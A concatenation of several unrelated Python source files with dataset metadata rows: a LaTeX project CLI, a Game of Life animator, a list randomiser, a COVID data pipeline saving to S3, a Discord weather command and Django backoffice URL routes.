click.echo(out.decode("ascii"), err=not success)
# if not dry run, both need to pass
return success and inferred_success
def execute(
self,
command_iter: Iterable[AtomicIterable],
state_init: Callable[[], Dict[str, str]] = lambda: {},
):
try:
# list is needed here to avoid generator short-circuiting:
# side effects are important!
if not all(
[
self.process_output(rtc)
for rtc in self.atomic_outputs(command_iter, state_init)
]
):
click.secho(
"\nError: Runner completed, but one of the commands failed!",
err=True,
fg="red",
)
sys.exit(1)
except AbortRunner as e:
click.secho(
f"Runner aborted with error message '{str(e)}'. Dumping stderr: ",
err=True,
fg="red",
)
click.echo(e.stderr.decode("ascii"), err=True)
sys.exit(1)
class ValidationFunction:
@staticmethod
def proj_exists(exists=bool):
return lambda proj_path: proj_path.validate(exists=exists)
@staticmethod
def git_exists(exists=bool):
return lambda proj_path: proj_path.validate_git(exists=exists)
def process_atoms(
*validation_funcs: Callable[[ProjectPath], bool], pass_template_name=False
):
"""Custom decorator which passes the object after performing some state verification on it."""
def state_constructor(template: Optional[str] = None) -> Callable[[], Dict]:
def state_init() -> Dict:
dct = {
"linked": {NAMES.convert_mode(mode): [] for mode in NAMES.modes},
"template_modifications": [],
}
names = {"template": template} if template is not None else {}
return dct | names
return state_init
def decorator(f):
if pass_template_name:
@click.argument(
"template",
type=click.Choice(template_linker.list_names()),
metavar="TEMPLATE",
)
@click.pass_context
def new_func_1(ctx, template: str, *args, **kwargs):
try:
for func in validation_funcs:
func(ctx.obj["proj_path"])
except ValidationError as e:
click.secho(
f"Error validating working directory: {e}", fg="red", err=True
)
sys.exit(1)
command_iter = ctx.invoke(f, *args, **kwargs)
runner = CommandRunner(
ctx.obj["proj_path"],
template_linker.load_template(template),
dry_run=ctx.obj["dry_run"],
verbose=ctx.obj["verbose"],
)
runner.execute(command_iter, state_init=state_constructor(template))
return update_wrapper(new_func_1, f)
else:
@click.pass_context
def new_func(ctx, *args, **kwargs):
try:
for func in validation_funcs:
func(ctx.obj["proj_path"])
except ValidationError as e:
click.secho(
f"Error validating working directory: {e}", fg="red", err=True
)
sys.exit(1)
command_iter = ctx.invoke(f, *args, **kwargs)
runner = CommandRunner(
ctx.obj["proj_path"],
toml_load_local_template(ctx.obj["proj_path"].template),
dry_run=ctx.obj["dry_run"],
verbose=ctx.obj["verbose"],
)
runner.execute(command_iter, state_init=state_constructor())
return update_wrapper(new_func, f)
return decorator
# TODO
# figure out how to just stick these wrappers directly inside the process_atoms function
# then -n and --verbose can be specified at the end, rather than right at the front
@click.group()
@click.version_option(prog_name="tpr (texproject)")
@click.option(
"-C",
"proj_dir",
default=".",
show_default=True,
help="working directory",
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, path_type=Path
),
)
@click.option(
"-n",
"--dry-run",
"dry_run",
is_flag=True,
default=False,
help="Describe changes but do not execute",
)
@click.option("--verbose/--silent", "-v/-V", "verbose", default=True, help="Be verbose")
@click.pass_context
def cli(ctx, proj_dir: Path, dry_run: bool, verbose: bool) -> None:
"""TexProject is a tool to help streamline the creation and distribution of files
written in LaTeX.
"""
ctx.obj = {
"proj_path": ProjectPath(proj_dir),
"dry_run": dry_run,
"verbose": verbose,
}
@cli.command()
@process_atoms(ValidationFunction.proj_exists(False), pass_template_name=True)
def init() -> Iterable[AtomicIterable]:
"""Initialize a new project in the working directory. The project is created using
the template with name TEMPLATE and placed in the output folder OUTPUT.
The path working directory either must not exist or be an empty folder. Missing
intermediate directories are automatically constructed.
"""
# must link templates before writing
yield OutputFolderCreator()
yield TemplateDictLinker()
yield InfoFileWriter()
@cli.command()
@click.option(
"--local", "config_file", flag_value="local", help="Edit local configuration."
)
@click.option(
"--global",
"config_file",
flag_value="global",
help="Edit global configuration.",
default=True,
)
@process_atoms()
def config(config_file: Literal["local", "global"]) -> Iterable[AtomicIterable]:
"""Edit texproject configuration files. This opens the corresponding file in your
$EDITOR. By default, edit the project template file: this requires the working
directory to be texproject directory.
Note that this command does not replace existing macro files. See the `tpr import`
command for this functionality.
"""
yield FileEditor(config_file)
def _link_option(mode: Modes):
linker = {"macro": macro_linker, "citation": citation_linker, "style": style_linker}
return click.option(
f"--{mode}",
f"{NAMES.convert_mode(mode)}",
multiple=True,
type=click.Choice(linker[mode].list_names()),
help=f"{mode} file",
show_default=False,
)
def _path_option(mode: Modes):
return click.option(
f"--{mode}-path",
f"{mode}_paths",
multiple=True,
type=click.Path(
exists=True, file_okay=True, dir_okay=False, writable=False, path_type=Path
),
help=f"{mode} file path",
)
@cli.command("import")
@_link_option("macro")
@_link_option("citation")
@_link_option("style")
@_path_option("macro")
@_path_option("citation")
@_path_option("style")
@click.option(
"--gitignore",
"gitignore",
is_flag=True,
default=False,
help="auto-generated gitignore",
)
@click.option(
"--pre-commit",
"pre_commit",
is_flag=True,
default=False,
help="auto-generated pre-commit",
)
@process_atoms(ValidationFunction.proj_exists(True))
def import_(
macros: Iterable[str],
citations: Iterable[str],
styles: Iterable[str],
macro_paths: Iterable[Path],
citation_paths: Iterable[Path],
style_paths: Iterable[Path],
gitignore: bool,
pre_commit: bool,
) -> Iterable[AtomicIterable]:
"""Import macro, citation, and format files. This command will replace existing
files. Note that this command does not import the files into the main .tex file.
The --macro-path and --citation-path allow macro and citation files to be specified
as paths to existing files. For example, this enables imports which are not installed
in the texproject data directory.
"""
for mode, names, paths in [
("macro", macros, macro_paths),
("citation", citations, citation_paths),
("style", styles, style_paths),
]:
yield NameSequenceLinker(mode, names, force=True)
yield PathSequenceLinker(mode, paths, force=True)
if gitignore:
yield GitignoreWriter(force=True)
if pre_commit:
yield PrecommitWriter(force=True)
@cli.command()
@click.option(
"--pdf",
"pdf",
help="write .pdf to file",
type=click.Path(exists=False, writable=True, path_type=Path),
)
@click.option(
"--logfile",
help="write .log to file",
type=click.Path(exists=False, writable=True, path_type=Path),
)
@process_atoms(ValidationFunction.proj_exists(True))
def validate(pdf: Optional[Path], logfile: Optional[Path]) -> Iterable[AtomicIterable]:
"""Check for compilation errors. Compilation is performed by the 'latexmk' command.
Save the resulting pdf with the '--output' argument, or the log file with the
'--logfile' argument. These options, if specified, will overwrite existing files.
"""
yield LatexCompiler(
output_map={
k: v for k, v in {".pdf": pdf, ".log": logfile}.items() if v is not None
}
)
@cli.command()
@click.option(
"--format",
"compression",
type=click.Choice(SHUTIL_ARCHIVE_FORMATS, case_sensitive=False),
help="compression mode",
)
@click.option(
"--mode",
"mode",
type=click.Choice(["arxiv", "build", "source"]),
default="source",
show_default=True,
help="specify what to export",
)
@click.argument("output", type=click.Path(exists=False, writable=True, path_type=Path))
@process_atoms(ValidationFunction.proj_exists(True))
def archive(
compression: str, mode: Literal["archive", "build", "source"], output: Path
) -> Iterable[AtomicIterable]:
"""Create a compressed export with name OUTPUT. If the 'arxiv' or 'build' options are
chosen, 'latexmk' is used to compile additional required files.
The --format option specifies the format of the resulting archive. If unspecified,
the format is inferred from the resulting filename if possible. Otherwise, the output
format is 'tar'.
If the format is not inferred from the filename, the archive file suffix is appended
automatically.
\b
Archive modes:
arxiv: format source files for arxiv (https://arxiv.org)
build: compile the .pdf and export
source: export
\b
Compression:
bztar: bzip2'ed tar-file
gztar: gzip'ed tar-file
tar: uncompressed tar-file
xztar: xz'ed tar-file
zip: ZIP file
Note that not all compression modes may be available on your system.
"""
if compression is None:
try:
compression = SHUTIL_ARCHIVE_SUFFIX_MAP[output.suffix]
output = output.parent / output.stem
except KeyError:
compression = "tar"
yield ArchiveWriter(compression, output, fmt=mode)
@cli.group()
def template() -> None:
"""Modify the template dictionary."""
@template.command()
@_link_option("macro")
@_link_option("citation")
@_link_option("style")
@click.option("--index", "index", help="position to insert", default=0, type=int)
@process_atoms(ValidationFunction.proj_exists(True))
def add(
macros: List[str],
citations: List[str],
styles: List[str],
index: int,
) -> Iterable[AtomicIterable]:
"""Add entries to the template dictionary. The --index option allows you to specify
the index to insert the citation (--index 0 means to insert at the beginning).
"""
for mode, names in [("macro", macros), ("citation", citations), ("style", styles)]:
yield ApplyModificationSequence((mode, "add", name, index) for name in names)
yield TemplateDictWriter()
@template.command()
@_link_option("macro")
@_link_option("citation")
@_link_option("style")
@process_atoms(ValidationFunction.proj_exists(True))
def remove(
macros: List[str], citations: List[str], styles: List[str]
) -> Iterable[AtomicIterable]:
"""Remove entries from the template dictionary."""
for mode, names in [("macro", macros), ("citation", citations), ("style", styles)]:
yield ApplyModificationSequence((mode, "remove", name) for name in names)
yield TemplateDictWriter()
@template.command()
@process_atoms(ValidationFunction.proj_exists(True))
def edit():
yield FileEditor("template")
@cli.group()
def git() -> None:
"""Manage git and GitHub repositories."""
@git.command("init")
@click.option(
"--repo-name",
"repo_name",
prompt="Repository name",
help="Name of the repository",
type=str,
)
@click.option(
"--repo-description",
"repo_desc",
prompt="Repository description",
help="Repository description",
type=str,
)
@click.option(
"--repo-visibility",
"vis",
prompt="Repository visibility",
type=click.Choice(["public", "private"]),
help="Specify public or private repository",
default="private",
)
@click.option(
"--wiki/--no-wiki",
"wiki",
prompt="Include wiki?",
help="Create wiki",
default=False,
)
@click.option(
"--issues/--no-issues",
"issues",
prompt="Include issues?",
help="Create issues page",
default=False,
)
@process_atoms(
ValidationFunction.proj_exists(True), ValidationFunction.git_exists(False)
)
def git_init(
repo_name: str,
repo_desc: str,
vis: RepoVisibility,
wiki: bool,
issues: bool,
) -> Iterable[AtomicIterable]:
"""Initialize git and a corresponding GitHub repository. If called with no options,
this command will interactively prompt you in order to initialize the repo correctly.
This command also creates a GitHub action with automatically compiles and releases
the main .pdf file for tagged releases.
If you have specified 'github.archive', the GitHub action will also automatically
push the build files to the corresponding folder in the specified repository. In
order for this to work, you must provide an access token with at least repo
privileges. This can be done (in order of priority) by
1) setting the environment variable $API_TOKEN_GITHUB, or
2) setting the 'github.keyring' settings in the configuration
Otherwise, the token will default to the empty string. The access token is not
required for the build action functionality.
"""
yield GitFileWriter()
yield InitializeGitRepo()
yield CreateGithubRepo(repo_name, repo_desc, vis, wiki, issues)
yield WriteGithubApiToken(repo_name)
@git.command("init-files")
@click.option("--force/--no-force", "-f/-F", default=False, help="overwrite files")
@process_atoms(
ValidationFunction.proj_exists(True), ValidationFunction.git_exists(False)
)
def init_files(force: bool) -> Iterable[AtomicIterable]:
"""Create the git repository files. This does not create a local or remote git
repository.
"""
yield GitFileWriter(force=force)
@git.command("init-archive")
@click.option(
"--repo-name",
"repo_name",
prompt="Repository name",
help="name of the repository",
type=str,
)
@process_atoms(ValidationFunction.proj_exists(True))
def init_archive(repo_name: str) -> Iterable[AtomicIterable]:
"""Set the GitHub secret and archive repository."""
yield LatexBuildWriter(force=True)
yield WriteGithubApiToken(repo_name)
@cli.group()
def util() -> None:
"""Miscellaneous utilities."""
@util.command("upgrade")
@process_atoms(ValidationFunction.proj_exists(True))
def upgrade() -> Iterable[AtomicIterable]:
"""Upgrade project data structure from previous versions."""
yield UpgradeRepository()
@util.command("refresh")
@click.option("--force/--no-force", "-f/-F", default=False, help="overwrite files")
@process_atoms(ValidationFunction.proj_exists(True))
def refresh(force: bool) -> Iterable[AtomicIterable]:
"""Reload template files. If --force is specified, overwrite local template files
with new versions from the template repository, if possible.
"""
yield TemplateDictLinker(force=force)
yield InfoFileWriter()
@util.command()
@process_atoms(ValidationFunction.proj_exists(True))
def clean() -> Iterable[AtomicIterable]:
"""Clean the project directory. This deletes any template files that are not
currently loaded in the template dictionary.
"""
yield CleanRepository()
@util.command()
@_link_option("macro")
@_link_option("citation")
@_link_option("style")
@process_atoms(ValidationFunction.proj_exists(True))
def diff(
macros: List[str],
citations: List[str],
styles: Optional[str],
) -> Iterable[AtomicIterable]:
"""Display changes in local template files."""
raise NotImplementedError
@util.command()
def show_config():
""""""
from . import defaults
from importlib import resources
click.echo(resources.read_text(defaults, "config.toml"), nl=False)
@cli.command("list")
@click.argument("res_class", type=click.Choice(NAMES.modes + ("template",)))
def list_(res_class: Modes | Literal["template"]) -> None:
"""Retrieve program and template information."""
linker_map = {
"citation": citation_linker,
"macro": macro_linker,
"style": style_linker,
"template": template_linker,
}
click.echo("\n".join(linker_map[res_class].list_names()))
| 30.771341 | 98 | 0.648122 | 2,346 | 20,186 | 5.456948 | 0.193521 | 0.018903 | 0.032807 | 0.037182 | 0.244962 | 0.22684 | 0.213014 | 0.186924 | 0.16599 | 0.155679 | 0 | 0.000717 | 0.239473 | 20,186 | 655 | 99 | 30.818321 | 0.833181 | 0.208511 | 0 | 0.331224 | 0 | 0 | 0.112499 | 0.003075 | 0 | 0 | 0 | 0.001527 | 0 | 1 | 0.07384 | false | 0.012658 | 0.050633 | 0.006329 | 0.151899 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df6ec61de92486e850b6c18987f949b40c50bc09 | 1,240 | py | Python | scripts/animate_life.py | acse-ogb119/MPI-Game-of-Life | b4658b46b5eccf8dd4f1d9e19d67dd1dbdff1f11 | [
"MIT"
] | null | null | null | scripts/animate_life.py | acse-ogb119/MPI-Game-of-Life | b4658b46b5eccf8dd4f1d9e19d67dd1dbdff1f11 | [
"MIT"
] | null | null | null | scripts/animate_life.py | acse-ogb119/MPI-Game-of-Life | b4658b46b5eccf8dd4f1d9e19d67dd1dbdff1f11 | [
"MIT"
] | null | null | null | import glob
from PIL import Image
from functools import partial
# read in metadata file entries to a list of lists
print("Loading simulation metadata...")
fname = "./outfiles/metadata.txt"
file = open(fname, "r")
metadata = []
for line in file:
line = line.split()
metadata.append(line)
# parse metadata variables
rows = int(metadata[0][1])
cols = int(metadata[0][2])
num_procs = int(metadata[1][1])
iprocs = int(metadata[2][1])
jprocs = int(metadata[2][2])
num_gen = int(metadata[3][1])
is_periodic = int(metadata[4][1])
freq_dump = int(metadata[5][1])
def create_animation():
palette = [0, 0, 0, 255, 255, 255]
palette = palette + [0]*(768-len(palette))
paths = glob.glob('./outfiles/dump*')
imgs = []
for path in sorted(paths, key=lambda x: int(x.split("p")[1])):
with open(path, 'rb') as ifile:
for data in iter(partial(ifile.read, rows*cols), b''):
img = Image.frombuffer('L', (cols, rows), data)
img.putpalette(palette)
imgs.append(img)
imgs[0].save('animation.gif', save_all=True, append_images=imgs[1:], loop=0)
# write and save the animation
print("Writing animation.gif...")
create_animation()
print("\nAnimation ready.")
| 27.555556 | 80 | 0.640323 | 182 | 1,240 | 4.318681 | 0.478022 | 0.111959 | 0.030534 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.036 | 0.193548 | 1,240 | 44 | 81 | 28.181818 | 0.75 | 0.082258 | 0 | 0 | 0 | 0 | 0.113757 | 0.020282 | 0 | 0 | 0 | 0 | 0 | 1 | 0.030303 | false | 0 | 0.090909 | 0 | 0.121212 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df70c9594d22d90dd33b9f0c85fed78d3076ccbf | 659 | py | Python | py/List.RandomiseDivide.py | mathematicalmichael/SpringNodes | 3ff4034b6e57ee6efa55c963e1819f3d30a2c4ab | [
"MIT"
] | 51 | 2015-09-25T09:30:57.000Z | 2022-01-19T14:16:44.000Z | py/List.RandomiseDivide.py | sabeelcoder/SpringNodes | e21a24965474d54369e74d23c06f8c42a7b926b5 | [
"MIT"
] | 66 | 2015-09-30T02:43:32.000Z | 2022-03-31T02:26:52.000Z | py/List.RandomiseDivide.py | sabeelcoder/SpringNodes | e21a24965474d54369e74d23c06f8c42a7b926b5 | [
"MIT"
] | 48 | 2015-11-19T01:34:47.000Z | 2022-02-25T17:26:48.000Z | import System
pf_path = System.Environment.GetFolderPath(System.Environment.SpecialFolder.ProgramFilesX86)
import sys
sys.path.append('%s\IronPython 2.7\Lib' %pf_path)
import random
def tolist(x):
if hasattr(x,'__iter__'): return x
else : return [x]
l1, rat, seed = IN
l1 = tolist(l1)
r = random.Random()
r.seed(seed)
r.shuffle(l1)
len1 = len(l1)
OUT = []
if len(rat) < 2:
rat.append(1.0 - rat[0])
if sum(rat) < 1.0:
rat.append(1.0 - sum(rat) )
start, end = 0, int(round(rat[0] * len1) )
len2 = len(rat)
for i in xrange(len2):
OUT.append(l1[start : end])
start = end
j = (i + 1) % len2
end += int(round(rat[j] * len1) )
if not OUT[-1]:
del(OUT[-1]) | 21.966667 | 92 | 0.657056 | 118 | 659 | 3.618644 | 0.398305 | 0.014052 | 0.046838 | 0.051522 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.052252 | 0.157815 | 659 | 30 | 93 | 21.966667 | 0.717117 | 0 | 0 | 0 | 0 | 0 | 0.043939 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.035714 | false | 0 | 0.107143 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df722af80887b0cf34a0cea5105db11e889fcaf7 | 9,621 | py | Python | pipeline/dags/scripts/covid_pandas.py | jjjchens235/covid-compared | c917a3f25738d61d48ce92478c7ef4ef7511d0f9 | [
"MIT"
] | 4 | 2021-02-11T22:53:18.000Z | 2021-06-11T19:42:34.000Z | pipeline/dags/scripts/covid_pandas.py | jjjchens235/covid-compared | c917a3f25738d61d48ce92478c7ef4ef7511d0f9 | [
"MIT"
] | null | null | null | pipeline/dags/scripts/covid_pandas.py | jjjchens235/covid-compared | c917a3f25738d61d48ce92478c7ef4ef7511d0f9 | [
"MIT"
] | 1 | 2021-07-07T15:47:39.000Z | 2021-07-07T15:47:39.000Z | """
Using pandas library, move data from John Hopkin's github repo to AWS S3
Data source: https://github.com/CSSEGISandData/COVID-19/tree/master/csse_covid_19_data/csse_covid_19_time_series
"""
import pandas as pd
import numpy as np
import re
from random import randint
import s3fs
class CovidDF():
def __init__(self, df, title, gb, metric):
self.df = df
self.title = title
self.gb = gb
self.metric = metric
class CovidData:
CONFIRMED = 'Confirmed'
DEATHS = 'Deaths'
RECOVERED = 'Recovered'
GB_US = ['country', 'state', 'county']
GB_GLOBAL = ['country', 'state']
cols_to_rename = {'Country_Region': 'country', 'Country/Region': 'country', 'Province_State': 'state', 'Province/State': 'state', 'Admin2': 'county', 'UID': 'location_id', 'Long_': 'lon', 'Long': 'lon'}
def __init__(self):
"""
Initalize each of the dataframes from the 5 John Hopkins time series files
"""
BASE_URL = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/csse_covid_19_time_series'
us_confirmed_url = f'{BASE_URL}/time_series_covid19_confirmed_US.csv'
global_confirmed_url = f'{BASE_URL}/time_series_covid19_confirmed_global.csv'
us_deaths_url = f'{BASE_URL}/time_series_covid19_deaths_US.csv'
global_deaths_url = f'{BASE_URL}/time_series_covid19_deaths_global.csv'
global_recovered_url = f'{BASE_URL}/time_series_covid19_recovered_global.csv'
location_url = 'https://raw.githubusercontent.com/CSSEGISandData/COVID-19/master/csse_covid_19_data/UID_ISO_FIPS_LookUp_Table.csv'
self.location = CovidDF(pd.read_csv(location_url, error_bad_lines=False), 'location', 'None', 'None')
self.us_confirmed = CovidDF(pd.read_csv(us_confirmed_url, error_bad_lines=False), 'us_confirmed', self.GB_US, self.CONFIRMED)
self.global_confirmed = CovidDF(pd.read_csv(global_confirmed_url, error_bad_lines=False), 'global_confirmed', self.GB_GLOBAL, self.CONFIRMED)
self.us_deaths = CovidDF(pd.read_csv(us_deaths_url, error_bad_lines=False), 'us_deaths', self.GB_US, self.DEATHS)
self.global_deaths = CovidDF(pd.read_csv(global_deaths_url, error_bad_lines=False), 'global_deaths', self.GB_GLOBAL, self.DEATHS)
self.global_recovered = CovidDF(pd.read_csv(global_recovered_url, error_bad_lines=False), 'global_recovered', self.GB_GLOBAL, self.RECOVERED)
self.DFs = [self.us_confirmed, self.global_confirmed, self.us_deaths, self.global_deaths, self.global_recovered]
def clean_time_series(self):
"""
Rename the cols of each dataframe, and rename all values of US -> United States
"""
for DF in self.DFs:
df = DF.df
df.rename(columns=self.cols_to_rename, inplace=True)
df.loc[df['country'] == 'US', 'country'] = 'United States'
def merge_missing_locations(self):
"""
The location file provided has a few missing locations (Yakutat, Alaska and Repatriated Travellers, Canada) as of 1/18/2021
Compare the US and Global confirmed files against the location file and add any missing locations to the location file
"""
#filter for the columns needed for combined key
df_gl = self.global_confirmed.df[['state', 'country', 'Lat', 'lon']]
df_us = self.us_confirmed.df[['state', 'country', 'Lat', 'lon', 'iso2', 'iso3', 'county']]
#create a combined key field in both us and global confirmed
df_gl['combined_key'] = (df_gl['state'] + ', ').fillna('') + df_gl['country']
df_us['combined_key'] = (df_us['county'] + ', ').fillna('') + (df_us['state'] + ', ').fillna('') + df_us['country']
#concat row-wise us and global confirmed
df_concat = pd.concat([df_gl, df_us], axis=0)
#get the missing locations
df_missing = df_concat.loc[~df_concat['combined_key'].isin(self.location.df['combined_key'])]
#create a 6 digit unique id, that's the smallest UID not used in the original location table
df_missing['location_id'] = df_missing.groupby('combined_key')['combined_key'].transform(lambda x: randint(100000, 999999))
df_missing['Population'] = np.nan
df_missing = df_missing[['location_id', 'country', 'state', 'iso2', 'iso3', 'county', 'Population', 'Lat', 'lon', 'combined_key']]
self.location.df = pd.concat([self.location.df, df_missing], axis=0)
def clean_location(self):
""" Clean/update the location dataframe """
df = self.location.df
df = df.rename(columns=self.cols_to_rename)
df = df[['location_id', 'country', 'state', 'iso2', 'iso3','county', 'Population', 'Lat', 'lon']]
df.loc[df['country'] == 'US', 'country'] = 'United States'
#have to manually recreate combined_key field since original field isnt consistently formatted
df['combined_key'] = (df['county'] + ', ').fillna('') + (df['state'] + ', ').fillna('') + df['country']
self.location.df = df
self.merge_missing_locations()
def get_date_cols(self, df):
""" Find the columns that match date regex """
pattern = re.compile(r'\d{1,2}/\d{1,2}/\d{2}')
date_cols = list(filter(pattern.match, df.columns))
return date_cols
def __convert_headers_to_datetime(self, df, date_cols):
"""
Convert the date columns from string -> datetime
"""
date_converted_cols = pd.to_datetime(date_cols, format='%m/%d/%y')
d = dict(zip(date_cols, date_converted_cols))
df = df.rename(columns=d)
return df
def __melt_cols(self, df, id_vars, metric):
""" Melt date columns to rows """
date_cols = self.get_date_cols(df)
cols_to_keep = id_vars + date_cols
df = df[cols_to_keep]
df = self.__convert_headers_to_datetime(df, date_cols)
df = df.melt(id_vars=id_vars, var_name='dt', value_name=metric)
return df
def melt_dfs(self):
""" For each df, melt datetime columns """
for DF in self.DFs:
DF.df = self.__melt_cols(DF.df, id_vars=DF.gb, metric=DF.metric).sort_values(DF.gb)
def __get_daily_totals(self, df, gb, metric):
"""
Converts metric cumsum value to daily values
"""
df['diff'] = df.groupby(gb, dropna=False)[metric].diff()
#fill the first diff value with the original value
#https://stackoverflow.com/questions/25289132/pandas-diff-on-first-records-in-timeseries-missing-data-returns-nan
df[metric] = df['diff'].fillna(df[metric])
df.drop('diff', axis=1, inplace=True)
return df
def get_daily_totals_dfs(self):
""" Converts cumsum totals to daily for all df's """
for DF in self.DFs:
DF.df = self.__get_daily_totals(DF.df, DF.gb, DF.metric)
def add_levels(self):
"""
Update inconsistent territory levels.
For example, China is only by country/state,
while France is by both country/state and country only.
This means that if summing up all the states to get each country's total,
would work for some countries (China),
but would double count for other countries (France)
To fix, this creates a seperate line for each missing level, i.e. create a country line for China
"""
for DF in self.DFs:
df = DF.df
if 'global' in DF.title:
null_countries = df.loc[df['state'].isnull()]['country'].unique()
# roll_countries don't have distinct country line, all their rows include states, i.e China, Aus
roll_countries = df.loc[~df['country'].isin(null_countries)]
#create distinct country line
rolled = roll_countries.groupby(['country', 'dt'])[roll_countries.columns[-1]].sum().reset_index()
rolled.insert(1, 'state', np.nan)
if not rolled.empty:
DF.df = pd.concat([df, rolled], axis=0)
else:
rolled = df.loc[df['county'].notnull()].groupby(['country', 'state', 'dt'])[df.columns[-1]].sum().reset_index()
rolled.insert(3, 'county', np.nan)
if not rolled.empty:
DF.df = pd.concat([df, rolled], axis=0)
def __save_csv(self, df, path, title, aws_key=None, aws_secret=None):
""" Save csv to either local or S3 """
f = f'{path}{title}_diff.csv'
if aws_key:
s3 = s3fs.S3FileSystem(key=aws_key, secret=aws_secret)
print(f'saving to s3: {f}')
f = s3.open(f, 'w')
print('finished s3 open')
df.to_csv(f, sep='\t', index=False)
def save_csv_local(self):
""" save as local file """
for DF in self.DFs:
self.__save_csv(DF.df, '/Users/jwong/Documents/', DF.title)
def save_csv_s3(self, aws_key, aws_secret, bucket):
""" save to s3 """
for DF in self.DFs:
self.__save_csv(DF.df, bucket, DF.title, aws_key, aws_secret)
#save location
self.__save_csv(self.location.df, bucket, self.location.title, aws_key, aws_secret)
def main(aws_key, aws_secret, bucket):
covid = CovidData()
covid.clean_time_series()
print(covid.us_confirmed.df.head())
covid.clean_location()
covid.melt_dfs()
print('made it to daily total')
covid.get_daily_totals_dfs()
print('made it add_levels')
covid.add_levels()
covid.save_csv_s3(aws_key, aws_secret, bucket)
if __name__ == '__main__':
main()
| 46.033493 | 206 | 0.640682 | 1,342 | 9,621 | 4.378539 | 0.209389 | 0.015657 | 0.013274 | 0.016338 | 0.249149 | 0.198094 | 0.161504 | 0.145507 | 0.11998 | 0.078795 | 0 | 0.011852 | 0.228251 | 9,621 | 208 | 207 | 46.254808 | 0.779529 | 0.206216 | 0 | 0.133858 | 0 | 0.007874 | 0.182459 | 0.041616 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125984 | false | 0 | 0.03937 | 0 | 0.259843 | 0.03937 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df731c4155c626f7babe8aacd42d7cca8b9a0894 | 595 | py | Python | cogs/utility/weather.py | austin1965/nuub_bot | 08fce234730ce506273199ca9c5c2a5f6e8e925a | [
"MIT"
] | null | null | null | cogs/utility/weather.py | austin1965/nuub_bot | 08fce234730ce506273199ca9c5c2a5f6e8e925a | [
"MIT"
] | null | null | null | cogs/utility/weather.py | austin1965/nuub_bot | 08fce234730ce506273199ca9c5c2a5f6e8e925a | [
"MIT"
] | null | null | null | import discord
from discord.ext import commands
from helpers.getWeather import getWeather
class Weather(commands.Cog):
"""
Weather Module
"""
def __init__(self, bot):
self.bot = bot
@commands.command(help="Get Tempurature of Specified Location")
async def weather(self, ctx, *, location):
location_temp_f, location_temp_c = getWeather(location)
await ctx.send(
f"The tempurature of {location.title()} is {location_temp_f} F and {location_temp_c} C."
)
def setup(bot):
bot.add_cog(Weather(bot))
| 24.791667 | 101 | 0.642017 | 74 | 595 | 4.986486 | 0.472973 | 0.130081 | 0.070461 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.258824 | 595 | 23 | 102 | 25.869565 | 0.836735 | 0.023529 | 0 | 0 | 0 | 0 | 0.225092 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.214286 | 0 | 0.428571 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
df740b38d28505e192ae196bb018bb75253e05d3 | 1,182 | py | Python | src/backoffice/urls.py | pwelzel/bornhack-website | af794e6a2fba06e09626259c7768feb30ff394be | [
"BSD-3-Clause"
] | null | null | null | src/backoffice/urls.py | pwelzel/bornhack-website | af794e6a2fba06e09626259c7768feb30ff394be | [
"BSD-3-Clause"
] | null | null | null | src/backoffice/urls.py | pwelzel/bornhack-website | af794e6a2fba06e09626259c7768feb30ff394be | [
"BSD-3-Clause"
] | null | null | null | from django.urls import path, include
from .views import *
app_name = 'backoffice'
urlpatterns = [
path('', BackofficeIndexView.as_view(), name='index'),
path('product_handout/', ProductHandoutView.as_view(), name='product_handout'),
path('badge_handout/', BadgeHandoutView.as_view(), name='badge_handout'),
path('ticket_checkin/', TicketCheckinView.as_view(), name='ticket_checkin'),
path('public_credit_names/', ApproveNamesView.as_view(), name='public_credit_names'),
path('merchandise_orders/', MerchandiseOrdersView.as_view(), name='merchandise_orders'),
path('merchandise_to_order/', MerchandiseToOrderView.as_view(), name='merchandise_to_order'),
path('manage_proposals/', include([
path('', ManageProposalsView.as_view(), name='manage_proposals'),
path('speakers/<uuid:pk>/', SpeakerProposalManageView.as_view(), name='speakerproposal_manage'),
path('events/<uuid:pk>/', EventProposalManageView.as_view(), name='eventproposal_manage'),
])),
path('village_orders/', VillageOrdersView.as_view(), name='village_orders'),
path('village_to_order/', VillageToOrderView.as_view(), name='village_to_order'),
]
